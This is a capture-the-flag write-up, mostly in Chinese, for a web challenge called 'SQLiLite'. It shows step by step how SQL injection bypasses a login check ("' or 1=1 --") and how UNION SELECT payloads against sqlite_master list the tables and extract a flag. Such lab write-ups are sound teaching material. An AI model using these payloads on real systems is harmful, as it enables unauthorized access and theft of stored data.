Description
Can you find the flag on this website.
Additional details will be available after launching your challenge
instance.Hints
SQLiLite
先随便输入个账号密码登录一下,得到查询SQL,接下来应该对SQL进行某些攻击来绕过密码登录成功
-- username: admin
-- password: 123
SQL query: SELECT id FROM users WHERE password = '123' AND username = 'admin'
password 条件在 username 前,我们只能先搞定password了
使用' or 1=1 --
建如下sql,试一下
-- username: admin(随便什么都行)
-- password: ' or 1=1 --
SELECT id FROM users WHERE password = '' or 1=1 --' AND username = 'admin'
登录得到如下界面
填入信息search一下发现这里大概的sql语句为
SELECT name, address, phone FROM table_name WHERE name = '';
提示使用的SQLite数据库,在 SQLite 中有个 sqlite_master
表,用来存储数据库表的一些信息,我们构建一个sql,用来展示都有哪些表及字段
' UNION SELECT name, sql, 1 FROM sqlite_master; --
SELECT name, address, phone FROM table_name WHERE name = '' UNION SELECT name, sql, 1 FROM sqlite_master;--';
得到上图信息,发现more_table
中有个flag字段,我们构建一个sql来查询,得到flag
' UNION SELECT 0, flag, 1 FROM more_table; --
SELECT name, address, phone FROM table_name WHERE name = '' UNION SELECT 0, flag, 1 FROM more_table; -- ';